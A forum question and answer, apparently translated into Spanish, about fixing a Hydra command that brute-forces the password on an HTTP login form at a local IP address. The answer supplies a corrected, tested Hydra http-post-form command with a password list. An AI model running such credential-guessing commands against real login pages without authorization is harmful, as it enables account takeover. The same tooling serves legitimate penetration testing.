hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!
No estoy seguro de por qué recibo el error, ya que existe el^PASS^ cadena. No hay ningún nombre de usuario en la aplicación.
La URL completa del formulario de inicio de sesión es:http://192.168.0.24:1234/
¿Alguien puede ayudar?
Respuesta1
Acerca de su pregunta:
- Al usar hidra, no es necesario anteponer
http://el anfitrión que vas a atacar. - Para especificar el puerto, utilice la
-sbandera. - Debe especificar la
-lbandera; de lo contrario, aparecerá un error. - En la solicitud POST debe especificar el archivo que recibirá la solicitud POST (por ejemplo, index.php, contraseña.php, validar.php, etc.)
- Y por último, pero no menos importante, hay que especificar el caso de Éxito o el caso de Fallo.
Pruebe el siguiente comando, es lo mejor que puedo hacer con la información proporcionada:
hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt
Lo probé yo mismo y no genera ningún tipo de error.
¡Buena suerte!